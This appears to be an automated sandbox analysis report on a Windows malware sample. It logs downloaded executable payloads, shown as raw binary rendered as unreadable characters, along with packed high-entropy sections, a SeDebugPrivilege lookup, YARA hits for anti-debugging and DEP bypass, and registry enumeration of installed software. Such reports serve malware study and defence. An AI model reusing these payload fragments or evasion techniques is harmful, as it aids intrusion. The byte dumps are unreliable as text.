InternetReadFile Jan. 23, 2024, 7:55 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¯¸¬eàbfþf f@ àf@¤fW fèÀf H.textaf bf `.rsrcè fdf@@.relocÀfjf@BàfHðjf´(ïBf0_~, (,( ~, (,( ~, (,( ~, (,( ~,~ èZ( ~,rprp( & 8Â~o ~ o ~o ~o (~ , (~ rp( ,( rpo (+)~ r1p( ,( rpo (( ( ( (X ~o ?.ÿÿÿ~&0/s s s o Þ ,o Üo 0(i +i]aÒXi2ç6((+Ò0c ( ~-þs ~(+(+ + i]XX ÿ_(X 2Ø(! 0w{X ÿ_}{{{X ÿ_}{{{({{{{{X ÿ_aÒ03s (}}}þs" (+0 0rKp(# s$ o% t0ª(& o' rcp( ( (( -() o (+ ,(, ,(- `(. ~/ (0 ~o1 o2 o3 Þ/&Þ~4 (0 ~o1 o2 o3 Þ& Þ* R'y%\|%¡%00 r1p rmp(5 s6 rçpo7 rpo7 rpo7 rYpo7 s6 rcpo7 rcpo7 rcpo7 rcpo7 s6 repo7 repo7 repo7 repo7 s6 (8 o7 (8 o7 (8 o7 (8 o7 (! "(9 (! 0D s: o; o< rep( ,o= &r{p( ,(( -o= &(! 0Írps> o? o@ +zoA rÓpoB oC oD ríp( ,!rpoB oC oE r%poF -) r5poF -rpoB oC rCp( ,Þ4oG :zÿÿÿÞ,o ÜÞ ,o ÜÞ ,o Ü(¤ ² ³¾ 0rYp( (I ,0 (J oK (&06(L (M ( (L (M Y j/ÞÞ&Þ//(! ëBfÎÊï¾lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSetPADPADP¸ì¤tHc¿IèÊ1sEd^@31839b57a4f11171d6abc8bbc4451ee4InstallSetup7ÙA rty25Á]toolspub1§b ÙA=Zýi1tlÿmÓmfp-j1pllmkmfpmj1pllmmhÊm´cÍ¸qL¡!8hsKpormMcn_o eLrnKi "O# oe } Hlmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkm6Ep!nÕVCcllmke{djqp$(lm mfpm 10llmkhfpmo1pllÀükmê\2oj1`llm{mfpmz1pllmC-Npm èY@qllmkmÎ'àmj1pl¼!-wmfpmj1pllmkmf<-1pllmk -æpmj1pllmkmfpmDtTxl1 -kmf0mj1pllmkMf`^r aa1Â,ll -k.mf0mj1pll-k@CdtmJJspP,lLmk@-fpmj1p,lÀCrrfbj ³pBml-kmfpmjqp@llmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pllmkmfpmj1pl efâ ®ÌªÌ¼Ì¡Ì¦Ì»ø ¯Ì Ì¡Ì§Ì¡ÌªÌñ4ÆòÌ¼Ì Ì Ì¡Ì>Pxm/gWû8ç@h3VüÂfum/øDýM°Q:8°9VV ðÌø41}ü2l(Ô8(èïu ÜÎÿ1èçm_ëÌ9p®?h1-èå request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 23, 2024, 7:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdð.$RtÏ(À@ÖXÐ` àÒNðÒü0Ó:GÀÊÙÔL«Ê(ôÒH.textàRR```.data/0R0"R@`À.rdata°Yr`XZrRX@`@.pdataÙÀÊÚ¬Ê@0@.xdataD ÌÌ@0@.bss&°Ì`À.edataNàÒÌ@0@.idataüðÒÌ@0À.CRTpÓªÌ@@À.tls Ó¬Ì@@À.rsrc:G0ÓH®Ì@0À.relocLÔöÍ@0BÃff.@Hì(H%¢Ê1ÉÇH&¢ÊÇH)¢ÊÇHì¡ÊÇH Êf8MZuHcP<HÐ8PEtiH²¡Ê ¬ÌÀtF¹èôRèwRHP¡ÊèWRH ¡ÊègfQHàÊ8tS1ÀHÄ(Ã@¹è®Rë¸@·PfútEfúu¸xÿÿÿø1ÉÒÁéfÿÿÿH áfQèlQ1ÀHÄ(ÃDxt=ÿÿÿDè1ÉEÀÁé)ÿÿÿfHì8HÅ ÊLÖÌH×ÌH ØÌ°ÌH©ÌHD$ HU ÊDèRHÄ8ÃAUATUWVSHì¹ 1ÀLD$ LÇóH«H=h ÊDEÉeH%0HlÊHp1íL%ÓäÒëDH9Æ¹èAÿÔHèðH±3HÀuâH5CÊ1íøÀlÇîÌøûíHÊHHÀtE1Àº1ÉÿÐèhQH XkQÿ6äÒH»ÊH ýÿÿHè\|RègfQHPÊHyÌèDR1ÉHHÀuëXÒtEát'¹HÀ¶ú ~æAÈAðú"ADÈëäfDÒt@¶PHÀÒtú ~ïHÌDEÀt¸ öD$\àâRHc-ÌDeMcäIÁäLáèRL-ñÌHÇí~B1ÛILÝè&RHpHñèZRIðHßITÝHÁHÃè:RH9ÝuÍJD'øHÇH=ÌèEcQHNÊLÌ ÌHLHtÌèî YÌWÌÉÙAÌÒHÄ[^_]A\A]ÃD·D$`éÿÿÿfDH5AÊ½øûýÿÿ¹è?RøþÿÿHUÊH >ÊèñRÇíìýÿÿ1ÀHéâýÿÿLÁÿáÒéVýÿÿfèÛR©ÌHÄ[^_]A\A]ÃDHÊH ÊÇèRéýÿÿÁèCRf.Hì(HUÊÇèºüÿÿHÄ(ÃHì(H5ÊÇèüÿÿHÄ(ÃHì(èRHÀÀ¶À÷ØHÄ(ÃH éÔÿÿÿ@ÃL¤$@ÿÿÿM;fFUHåHì8H$HèäHÂi»èíDèÛäH$HHHL$(@D$0@D$@@(D$P@8D$`1ÉëCHL$ HDÌ(HD$è/äèæHD$DèÛéèväHL$ HÿÁH$HfDHù \|·èõãè0æèKäèæãHp9i»èUìè0äH´$HHFHHD$pHFPH\|$xHñHÆfHl$ðHl$ðèHm1Àë8HD$ HLÄpHL$èuãèpåHD$è&éèÁãHD$ HÿÀH$HHø\|ÂèFãèåèãè6ãHgi»è¥ëDè{ãH$HHÀH$ðÈ$øØ$è$ø$(1Àë9HD$ HÄðH$èèªâè¥äH$èèêèóâHD$ HÿÀHø \|ÁDè{âè¶äèÑâHÄ8]ÃHD$è{îHD$éýÿÿÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌI;fvSUHåHìHùw1HÉt,HQÿHÑu Hû sHØHÄ]ÃHØ¹ èûHtÐ\HíæyèÈÀHD$H\$HL$èóíHD$H\$HL$ëÌÌUHåHìHÙHÁû?HÁë=HHÓHÁúfHús1HãøH)Ù¶HÉ\|¾ÓæHù ÿ!þ óHÄ]Ãè©¬HÐ¹è[ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUHåHìHÙHÁû?HÁë=HHÓHÁúfHús1HãøH)Ù¶HÉ\|»ÓãHù ö!óÓÀHÄ]Ãè)¬HÐ¹èÛÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUHåHìH iXVHZXVH9È}s2HÁàHH\HÈHÄ]ÃHÉv HHZHÄ]Ã1ÀHÁèqèÌÌÌÌÌÌÌÌÌÌÌ¶@àÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ¶HöÁÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHxÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ¶HöÁ ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ¶HöÁ ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌI;fv`UHåHìHÉ\|MHP HÖH÷ÚH9ÑwH9ÙrH)ÙHÊH÷ÚHÁú?H!ÓHHËHÄ]ÃHØèQHötèGgèâgfè;gHD$H\$HL$èfëHD$H\$HL$érÿÿÿÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUHåHì·PfÒt"pHðfHúwÓÙHÄ]Ã1À1ÛHÙHÄ]Ã»èÕÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUHåHì·PfÒt"pHðfHúwÓÙHÄ]Ã1À1ÛHÙHÄ]Ã»èuÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ¶HáHùuH@@Ã1ÀÃÌÌÌÌÌÌÌÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ¶HáHùuH@8Ã1ÀÃÌÌÌÌÌÌÌÌÌÌ request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 23, 2024, 7:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPELhÖeà!!g à@ z<{P°øÀ°o8èo@ H.textV `.rdata b d@@.datav@À.rsrcø°@@.relocÀ@Bj hèl¹pèßHhèSYÃÌÌÌj hm¹è¿Hh`èSYÃÌÌÌjh0m¹ èHhÀèmSYÃÌÌÌjhHm¹¸èHh èMSYÃÌÌÌjham¹Ðè_Hhè-SYÃÌÌÌjham¹èè?Hhàè SYÃÌÌÌjham¹èHh@èíRYÃÌÌÌjham¹èÿGh èÍRYÃÌÌÌhè¾RYÃÌÌÌÌh`è®RYÃÌÌÌÌhÀèRYÃÌÌÌÌj?hèm¹xè¯Gh è}RYÃÌÌÌhènRYÃÌÌÌÌh è^RYÃÌÌÌÌh@èNRYÃÌÌÌÌhàè>RYÃÌÌÌÌhè.RYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèb[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!Pè[ÄöEtjVèLNÄÆ^]ÂAÇÔ!Pèi[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhzEôPè;[ÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèRZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hdmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèEjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPè§DMüE9MÇE¬BM}QCEMPÇE°ÆEèvD}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè«jMÄ3uÀÄÆëÆE¼Mäÿu¼SèG}E°ør+HÇùrüÁ#+ÇÀüøQWèXKÄUúr,MBÁúrIüÂ#+ÁÀüødRQè$KÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQèJEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèDJÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèþIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQè¸IÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhamÇCÇCÆèÝAUúr(MBÁúrIüÂ#+ÁÀüøwbRQè"IÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèÓHÄ_^Ã[å]ÃèðnÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVham3ÛèAÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèÆAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèµGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèBGÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQèGÄÿtuøéoþÿÿ_^[å]ÃèmÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèÞ>Eà×PMÈè@ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè FÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQè§EÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèeEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃènkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè=}EÿuCE¹0Pè=5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc0018	1	1
InternetReadFile Jan. 23, 2024, 7:56 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL!ècà DÞ @àEL\|F( D ?À!P?@ p.textM `.rdataâ. 0@@.data<NBPPD@À.rsrc ? D@@@ff ÃÌÌÌÌÌÌÌÌÌ ÃÌÌÌÌÌÌÌÌÌÌÌá4ïÆÃÌÌÌÌÌÌÌÌÌUì¸<èSEVW8@3ö=$EøuVÄ÷ÿÿQVÿ( B¡cBcBEØSEèuèUÔèÿÿÿ]è cB$cBÃ?]èMÜUÌÇEà ëëI3öÇEôEô $ÇÁàEüùuUVÄïÿÿPhx4Bÿ` BVMÈQVVVÿT BVVÿt B3Ò3ÀfEæMÄQfUäUäRVÄûÿÿPVÿ@ BEü $EÜEüù©uÇ @.ëíëùëuVÿ BVÿ B5Ô{;MìMô×ÓêÇî=êôUÌEì1Eü3UüUÐEÐEød)EømødUøÁâUüEÔEüuðEèEðEøEðEðEìuøMôÓîuØEì1Eü=$ujÿ BEü3ÆÃGÈa+ømàEü]èºþÿÿ=$m u>[ujjjÿ BEø_F^å]ÂMø_N^å]ÂUì¡$ìDÁèV5Ø{Àv4S$ BWø=$Y uÿÓÿÓE¼Pÿ0 BVè½ýÿÿÆïuØ_[^å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQÇEüEün6EüØ{å]ÃÌUììhÜ4BÿP B±t²rhXªBP£Ü{ÆXªBVÆYªBiZªBÆ_ªBP eªBÆfªB [ªBÆdªBcÆ\ªBuÆ]ªBaÆ^ªBl`ªBÆaªBo bªBÆcªBeÿD B£Ð{ÇEü Eü Mü$EøP¡Ø{QRPÿÐ{å]ÃÌÌÌÌÌÌÌUìd¡jÿh(BPd%¡$ì(SVW=uNhì4Bh(5Bÿ\ BEÌè+jÇEüèÁÄjjè(jjèàjjèÄjèµ @BKPj £$ÿX B£Ø{èþÿÿ3ö95$vc=, B B2K Ø{1=$u&hp5Bjÿ×jjUðRÿÓh5Bjÿ4 Bÿ BF;5$r¯5d B= Bh B3ÀEð $ÈùuKhä5BÿÖjjjjjÿ×jÿÓjÿ BUìRjh(6Bjÿp Bjÿ Bjjjjÿ BEð@=Eð\|è-ýÿÿ=< B3öëIjÿ×þbuèrýÿÿFþÛt\|é5 B=L Bx BÇEì{=$uIjÌûÿÿPh6BÿÖh¼6Bhô6Bÿ×Ì÷ÿÿQjh7BÿÓ3À3ÒMèQfUðfEòUðRPPPÿ Bmìu¥h¬7BÿP BÿØ{Mô_^d [å]ÃÌÌÌUìì$=$VWuEÜèÔuÜèì=8 BS]ü3öÿ×þü~ûå~xu Fþ\|å=< B B3ö¤$jÿ×ÿÓÿ BþGm Fþ¤ö\|ã=l B3ö[jÿ×þ%+ Fþ§\|ë¡lB£$èýÿÿ5\| B¿ë ¤$ÿ=$ujjÿÖïué_3À^å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌVQðÄèÆè~jèGÆ^ÃÌÌÌjè9ÃÌÌÌÌÌÌÌÌVQðÄèµÆèjègÆ^ÃÌÌÌjèYÃÌÌÌÌÌÌÌÌUì}t~rFè¹ÆÇFè{]ÂÌÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUì}t~rFèÆÇFèk]ÂÌÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ3ÉMÿHèÐEÿèEøÿÿå]ÃÌxr@ÃÀÃÌÌPèYÃÌÌÌÌÌÌÌÌUìQ3ÉMüHèÐEüèõ÷ÿÿå]ÃÌPèìYÃÌÌÌÌÌÌÌÌxr@ÃÀÃÿUìEVñÆFÀucèqFHlHhN; VBt ,UBHpuèF;0TBtF ,UBHpuè FFö@puHpÆFë @FÆ^]ÂÿUììSVu3Û;óu èÇSSSSSÇèOÄÈÿéÌW}ÿÿÿÿvèSSSSSÇè#ÄëLÿuMìèÿÿÿEì¸¬uWVè¬YYëwSSWVj ÿpÿ BÀuèLÇ8]øtEô`pýÈÿëT]ü];ûv7:Ãt,Mì¶ÀQPèYYÀt ÿE9}sF8tÿEüFÿE9}rÎ9}rÇëEü8]øtMôapý_^[ÉÃÿUìjÿuÿuèëþÿÿÄ]ÃÌW\|$ën¤$ÿL$W÷ÁtÁÀt=÷Áuïÿºÿþþ~Ððÿ3ÂÁ©tèAüÀt#ät©ÿt©ÿtëÍyÿë yþëyýëyüL$÷ÁtÁÒtfÇ÷ÁuêëÇºÿþþ~Ððÿ3ÂÁ©táÒt4öt'÷Âÿt÷ÂÿtëÇD$_ÃfD$ÆG_ÃfD$_ÃD$_ÃÿUìj jÿuè3Ä]ÃÿUìÿuj jÿuèEÄ]ÃÿUì]éÜÿÿÿÿUì]éGÿUìSVuW3ÿËÿ;÷uènWWWWWÇèöÄÃëBöFt7VèX VØè VèçPèÄÀ}ËÿëF;Çt PèÞY~~Ã_^[]Ãjh ABèT#Mäÿ3Àu3ÿ;÷À;ÇuèëÇWWWWWèsÄÈÿëöF@t~EäèW#ÃVè,"Y}üVè*ÿÿÿYEäÇEüþÿÿÿèëÕuVèz"YÃ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (5 events)

section

{u'size_of_data': u'0x00072a00', u'virtual_address': u'0x00001000', u'entropy': 7.999567521714596, u'name': u'', u'virtual_size': u'0x0010a000'}

entropy

7.99956752171

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00011e00', u'virtual_address': u'0x0010b000', u'entropy': 7.997448118243177, u'name': u'', u'virtual_size': u'0x00027000'}

entropy

7.99744811824

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00000800', u'virtual_address': u'0x00132000', u'entropy': 7.294019991877545, u'name': u'', u'virtual_size': u'0x00004000'}

entropy

7.29401999188

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0009da00', u'virtual_address': u'0x00445000', u'entropy': 7.93905470768719, u'name': u'.data', u'virtual_size': u'0x0009e000'}

entropy

7.93905470769

description

A section with a high entropy has been found

entropy

0.986423419601

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 23, 2024, 7:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000488 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA Jan. 23, 2024, 7:55 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x00000494 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
